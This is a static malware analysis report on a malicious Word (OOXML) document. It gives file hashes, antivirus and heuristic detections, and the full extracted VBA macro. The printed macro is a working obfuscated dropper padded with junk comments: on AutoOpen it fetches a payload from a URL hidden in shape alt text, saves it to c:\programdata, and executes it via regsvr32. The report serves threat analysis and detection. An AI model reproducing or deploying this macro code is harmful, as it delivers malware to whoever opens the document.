Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 ae30632570b4b2cc…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 138.1 KB
Created: 2020-10-06 09:52:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2020-10-09
MD5: e734fa5d84d0be8f5c64426c8b4035b3
SHA-1: 85666af1c30d5d6571067ac97563d0b47da921cf
SHA-256: ae30632570b4b2cc36189283baf703d18e9a8ace92aea88f846345c8c3031203
Risk score: 170

Heuristics (6)

  • ClamAV: Doc.Dropper.Generic-9823539-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Generic-9823539-0
  • VBA project inside OOXML [medium, 3 related findings] OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script:
    Set rNECW = CreateObject("WinHttp.WinHttpRequest.5.1")
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script:
    Sub AutoOpen()
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 10309 bytes
SHA-256: 0843fc16efed1ea9ba3962676ad5d0412ecc0ae2f9c0b3e556c5f2c00f5a5d67

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Lgzab"
Sub VLgiO(FOwkt, Optional ByVal ZnPYB As String = "c:\programdata\KFpFM.pdf")
' Excuses
' Disputation raincoat rising westernmost
' Lawlessness
' Stringent fatiguing knell
' Reintroduce casanova specifically
' Vertebrates easternmost
' Radiograph huntergatherers hopefully inspiration
' Burps
' Chintz user nightly
' Conversion
' Range disinformation despair
' Interject means thebes stagnating
' Exigencies narrator into singleminded
' Goalpost globalisation
' Infamously monetary detonations throroughly
' Dissatisfied flatness dumps armour
' Erring dressing libraries hugging stalling
' Porns carvery bleeding
' Smashed aftereffect runny monaural conversed interpreting
' Lurked pyromaniac constriction
' Tentacle swirling semiconscious
' Texturally
' Sky regenerated
' Storing eloquently overstuffed thinkers confectioner
' Heptagonal baseball
' Hover placid scholastic peripheries murmurs
' Recombined uneasily
' Clandestine cinder
' Preferences ordinal
' Lodging
' Frees audaciously
' Mobilisable biassed hundred
' Bonded neutrally insidiously sewer
' Geometer manatee
' Superlatively gruel
' Speculative droopingly disenfranchisement skylight manually dominion
' Bourbons ignominy cleared hydroxides
' Historiography producing
' Martin quintic criminologists
QurcP = ZnPYB
Open QurcP For Output As #1
' Briefs extraordinary catechisms moaning
' Decisiveness terrifies
' Howsoever disclosure reinterpreted
' Assiduously subtleties
' Fit chequers resubmitted thrombus default
Print #1, FOwkt
' Mineral ho liquidising conventional gunned
' Decimating incorporating specialness
' Choirboys trophy mentalistic basting
' Bombs theta carbuncles led spinoff bevelled virginal
' Tantalisingly intestate
Close #1
End Sub
' Hurls accident arbitrations
' Sprouted
' Trisecting bright
' Impermeable doubts
' Tibiae varnishing haitian effigy cairn
' Gilders intruders annoyers repartition
' Moves permissible wounded lark
Sub AutoOpen()
' Beehives scorpion tensing approachability conversion
' Repertory cobble controlling ohms anal
' Origins alibi agitated yesterday phrenologists technically asymptote
' Perishes capriole slipper
' Whey extirpation
' Photoelectrically stuck adaptively basketry
' Idyllic unionised
' Footings desperation agglutinative incapacitating
' Oaken true headwork sunnier
' Familiarly malignancies flawlessly helicopters fume hermitage
' Madden
' Agreeing counterbalance waviest maisonettes illustrator
' Draughtsmanship transposition indiana
' Fitly
' Saturnine litters molesters coppices dermatologists carnal
' Awakened lemon cowherd
' Adroitly domestically immunise
' Spilt harshens patiently
' Footmen bluemoon
' Snapshot repackaged
' Gauging scuffing oracle zombie
' Yelled ideologist
' Tipple obdurate polarisation endeavoured iconographic
' Jazzy collies slushiest dewy restructuring
' Prelates dingo motorcyclist refrigerants
Dim cfqNf As New kIbPj
' Precocious transporter trinket compliance boons
' Crouching stare rematerialised cloven
' Glob cantons exploring hygienist billiard hacker
' Crisscrosses ephor drying glaring debenture
' Drunkard discipleship festivities strengthen faunal inhalant
FOwkt = cfqNf.AlImd()
' Testimony
' Legislate radiate
' Affability appreciated
' Trendiness tune
' Desperate kongo fireproof flimsy
' Eightieth cupboard marked larceny
VLgiO PYRQd(FOwkt)
' Dredging gladly seventieth computerliterate exhibitionism relearn
' Percolation expensive reassuming
' Propose booby planetesimals tremor
' Relic forlorn gallon refillings
' Helpfulness dispositions
' Animation kilometre pantiled conquerable
' Cowering orchestra
' Chaperone porkchop commutativity
' Photographic
' Untextured prosper subcontracting
RrMYM XNYBo(0) + "r32 c:\programdata\KFpFM.pdf", ""
End Sub
Function UFLVz(fIwKD, kEtzP)
' Toss photolysis naughts threesomes ennobling lawsuit
' Tibia tailplane
' Larynxes frogmen stepladder throatiest unmaintained
' Opportunists
' Galactic tax marking merry
' Suede pruned equipments deletes
UFLVz = Split(fIwKD, kEtzP)
End Function

Attribute VB_Name = "wWYkw"
' Guild buttressing suggestive aswan investigate strictness
' Screw monarchic
' Regrets nicknames contrariwise molecule cottages
' Prettify wonderfulness currency assuages
' Accumulate
Function PYRQd(HQwQT)
' Irredeemably mutilated avid bureaucratic anaesthetic
' Carved directors frisson
' Fetches fly subplot parry
' Warsaw usherette inhabits footman
' Hypercubes provident legalise bequests bigness
PYRQd = StrConv(HQwQT, vbUnicode)
' Limbering stereotype groggiest
' Pyromaniacs method canary
' Liquidation chastise embarrassedly enthalpies
' Retinitis persecute blinking bra antigens
' Hairbrush matcher truants unreal brazil elongates
End Function
' Stringing rerouted misfire composing discrepant
' Blemished wanderer
' Standards nairobi newness
' Averts handler quickened
Function MLhBm()
' Introverted snatching ticking
' Attacker cowboy
' Romantics gleefulness negligee
' Batons lip malachite
' Quarrels pawn
' Foams militaristic diehard
' Refreshments
' Contemplated specialisations
MLhBm = ActiveDocument.shapes(1).AlternativeText
End Function
' Doubters mezzosoprano megastar uncountable crouches
' Artichoke fables hertz urbanely
' Splattered burgle splash realistic fiercer
' Aboard utah ricocheted latrine
Function XNYBo(OniCN)
' Bahamas
' Thymus cyclic lankiest
' Catapults tautly reconstitution regales
' Homoeopathic airbase
' Undressed sorcerers inhaled envelops
' Wrangling shielings usage
' Deforestation
' Ambassadorial entailed nestegg
' Clumsy animators depraves goalless
kaHFl = MLhBm()
TIieZ = UFLVz(kaHFl, "kristi")
OFMcZ = TIieZ(OniCN)
XNYBo = OFMcZ
End Function

Attribute VB_Name = "kIbPj"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Numberless inspire
' Dove conveyed
' Piecing wrinkle sneakiest saki
' Hoverer cockerel
' Stochastic maleness forgiven manipulators
' Bejewelled
Function AlImd()
' Floridly muzzling fetal puritanism emphysema
' Defaced mooing dovetails
' Hosier drafting
' Entrances hostel
' Rosily infest
Dim rNECW As Object
' Torturous mending intro hares clay
' Sentimentalist
' Expressing image missal backsliding
' Bulldozers crustier
' Trust niches breakaway tricolour
' Chomp frustratingly
Set rNECW = CreateObject("WinHttp.WinHttpRequest.5.1")
' Aid sinking reinforcement
' Enclasp coupons perfect
' Intermissions conveying anoint
' Miniaturisation microgravity uncontentious
' Haltered feat obstinate
' Lagoons physician tipsy jejune
' Beau internally tartan
' Welcomed scenery rayed
' Delightedly explorer rakish designs
' Stunts
' Dismay sneered emigrants frumpy
' Intent happier
' Deerstalker wakens introvert heredity
' Peeped spellers
' Commemoration piranha brutalised imams
' Ironmongery outgrowth officialdom aqua
' Pustules paralysing
' Dermal bib starlet hitch steeped bivalve
' Forester anatomically dairymen
' Grownup competes
' Compiles kelts keeled click meanest
' Dents emotional unknowns
' Forwardness maddeningly accreditation
' Pings fifteen spelling
' Fusion idiolect
' Staggered meows rapping extrapolation quiescent enlarges
' Haste networking handrails autonomously labyrinthine
BBTJg = XNYBo(1)
' Doodled coursework punch unsightly underlings
' Camphor diary sprats factory unjust
' Stickers
' Victimless impropriety
' Tarpaulins desecrated
rNECW.Open "GET", BBTJg, False
' Behold retraced unattached inverses deliverers divulged
' Commandingly eroding catered
' Packed
' Alternately bong
rNECW.Send
' Saner insubstantial quorum
' Eventualities ecumenism supranationalism turnover
' Gatecrash anywhere fanatical
' Everchanging estimating
' Desirableness
AlImd = rNECW.responsebody
End Function

Attribute VB_Name = "LtDJi"
Sub RrMYM(mjmZI, tZzPk)
' Brethren underlying
' Sophisticates lurchers tangerines adjectival impoverished
' Profaneness rivulet
' Monogamously tyrannicide spiritedly reintroduction
' Conceded boxtops
' Barracking contretemps
' Scrambler nearly petty
' Heartbroken
' Fended gladiators circumvent
' Salacious overextended missiles
' Diaphragms delivering informality shank matures
Set ZLokh = CreateObject(tZzPk + XNYBo(2) + "ll").exec(mjmZI)
' Suggestive rumblings cirrus
' Aviation pancakes purposely virility groomer dampens
' Averts suchandsuch
' Undaunted alchemical sent extremist cornets
' Retreating lemma
' Fogs industrialise
' Belonged foreshortening pangs clinking
' Bun
' Eden ibexes controllers distally
' Acetal buckskin prosody praised
' Ruining
' Burps manometer stocking inaccuracies disaffected bulletproof
' Declivity presuming securer powdered ratatouille cops
' Oppressiveness bellyful
' Closes arbitrations homosexually suspended
' Mixed introducing adjudicates turret
' Cruller glaring
' Turbocharger behaviours exploit electrotechnical
' Testing
' Prosecutorial crochet subdivides irk breakaways undermining
' Unfasten
' Habitations rhinoceros
' Cornices snowdrops emits cumlaude
' Help dictator hindbrain rectum
' Daddies coral flyweight workers
' Romanticising ponytail assiduously reinsurance
' Tarnish
' Feminism lacuna vertiginous contuse tsetse
' Cavaliers anal lute shortfall calcutta
' Header
' Unhealthier jauntily
' Nostalgically omnivores critical
' Wallow compactness influxes crops nests
' Impossibility intellectuals
' Starkness particularised abounds similar
' Tannery thinned dovetails
' Booster globules rehearing
' Sigmoid immunity hymen entomb
' Edging hallucinating farad festival perspicuous teaspoons tectonic
' Infeasibility
' Ahead fringy tourer
' Crock describable paraboloids
End Sub

Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 40960 bytes
SHA-256: a873661e72266f8028aacb4b03917f4f10b2734f73031945c232b5836f424e23